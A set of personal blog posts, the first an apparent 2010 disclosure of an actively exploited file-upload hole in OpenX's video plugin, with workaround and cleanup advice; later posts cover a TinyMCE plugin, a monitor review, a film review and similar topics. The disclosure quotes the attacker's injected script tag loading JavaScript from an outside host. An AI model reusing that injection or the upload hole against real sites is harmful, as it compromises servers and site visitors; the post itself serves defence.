There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly noone bothered to release a fix, yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected since this file seems to be connected to reports of the video plugin and might even be unused (since it is part of a whole library). Alternatively, access to the file can be restricted via htaccess to trusted users.

I highly recommend to do this immediately, since this vulnerability is being actively exploited.

Also check for signs of a already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that noone else can take control over his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you probably have already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server because it might have been rooted. But if your server was configured savely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time consuming measure.

I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting therefore preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.

Installation

Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.

Download

bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhebition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kinda “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhebition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together both media tell an abstract story like it would not be possible for each medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances somewhen…

Ok, “my” is not quite right in this case. Not too long ago I bought a new monitor, the Samsung SyncMaster 226bw, and i would not be that decadent to buy yet another new monitor so soon. :) I am using the Dell UltraSharp 2709W for a larger project, but I do not own it. Bold 27” screen size and a resolution of 1980×1200 come quite handy for video post processing. Too bad I’ll have to return it some day…

Specs

Screen size: 27“
Resolution: 1980×1200
Video ports: DVI, VGA, HDMI, DisplayPort, Composite Video, Component Video
Viewing angles: 178°/178° (Standard)
Contrast: 3000:1 (dynamic), Standard
Response time: 6 ms (Grey to grey), Standard
Energy consumption: 57 W (standard); 110 W (max)
Panel technology: S-PVA
Integrated speakers: no
Other integrated accessories: 4 port USB hub, 9-in-2 card reader
Price: Bought in July 2008 directly from Dell for 623 Euros. Current price: 831,81€

First Impression

After unboxing my 2709W, my first thought was „yay, biiig“. :) The UltraSharp 2709W fits just barely together with my laptop and old monitor on my desktop. The second monitor has to be turned upright to fit it besides the large 27” screen.
My personal command center. :)

Design

Visually, this large monitor does not have to hide. He is well built and has a beautifully simple design which also isn’t destroyed by pointless speakers. The material itself does not feel or look cheap, although Dell’s official product photo does not look that convincing. Fortunately, it looks better in reality.

One reason why the monitor looks so beautifully simple is that there are very few visible buttons. Only the power button is permanently emitting a blue or orange light. The other buttons for menu controls are very small LED rectangles, which stay black and mostly invisible when not in use. The only awake and shine when you approach them with your hand or finger. This is quite cool, although the technology still seems to have a few hiccups – more about this later.

Image Quality: See next page

(This article is also available in German)

Plot Preview

Bruce Campbell (Bruce Campbell) is currently busy producing his newest movie, the terrific Cave Alien 2, when a young fanboy* asks for his help. He accidentally released an ancient Chinese daemon that now has set out to slaughter everyone who is related to the fanboy – coming from a small town this puts its whole population on the brink of a bloody death.

The passionate Bruce Campbell fan sees only one solution to this problem: Bruce himfels has to save the town utilizing his elite monster slaying powers which he aquired acting in various grand movies like Evil Dead. The True Fan faithfully overlooks the dramatic downfall which Bruce’s career has taken since his heydays. Neither is Fanboy irritated by the fact that his idol turns out to be the most arrogant asshole alive who couldn’t care less about his fans and annoyingly keeps hitting on fanboy’s mother (and pretty much any other female).

Thanks to some gentle persuasion involving a baseball bat and Bruce’s subsequent erroneous assumption that the whole story is just an elaborate birthday present from his manager (Ted Raimi), he agrees to pick up the fight against the daemon…

Review

As one might guess from the plot description, My Name is Bruce is not exactly a movie that is meant to be taken seriously. It is a parody – primarily on Bruce Campbell himself, but also on the movies in which he acted.

» read on!

(This article is also available in German)

Pretty much every substance can be unhealthy or even lethal when taken in large enough quantities. This also holds true for plain water.

If one digests too much water, the level of sodium in the blood gets out of balance. There is enough sodium, but too much water. The consequence is a hyponatremia, or water intoxination. The possible symptoms are quite scary:

”Initial symptoms typically include light-headedness, sometimes accompanied by nausea, vomiting, headache and/or malaise. Sodium levels below 100 mmol/l (2.3 g/l) frequently result in cerebral edema, seizures, coma, and death within a few hours of drinking the excess water.” (Wikipedia)

In extreme cases it is even possible to die of water. This should be quite impossible through any sane consumption (so don’t panic), but every now and then some people indeed manage to die of water – usually in the context of strange contests.

» read on!

(This article is also available in German)

I stumbled over a beautiful photo set by Kevin Scanlon. Bearing the simple title “Railroad” it shows diverse impressions of railroad scenery.

I’m not particularly drawn to railroads, but these photos are really beautiful. Especially the numerous shots with backlight produce a wonderful atmosphere.

» “Railroad” by Kevin Scanlon

Why Kevin Scanlon presents such beautiful images on such a not beautiful website is beyond my comprehension, though. :)

(This article is also available in German)

A matte painting commonly refers to a painted or drawn piece of scenery used in movies or animations. They belong more or less to the standard repertoire of special effects.

James McWilliams created an interesting short video which shows the progress of such a painting. In several steps he first paints the scenery of an “ancient bathhouse” (read: mysterious ruins including a water fall). Then the painting is projected onto simple 3d geometries and a short tracking shot through the scenery is animated.

The video is a nice insight into how such effects are created. The download size is kinda hefty, though: 65MB.

» Digital Animosity / James McWilliams

(via The Reaction)

See also

• Photo-Compositing Step by Step
• Painting Textures for 3D-Models

(This article is also available in German)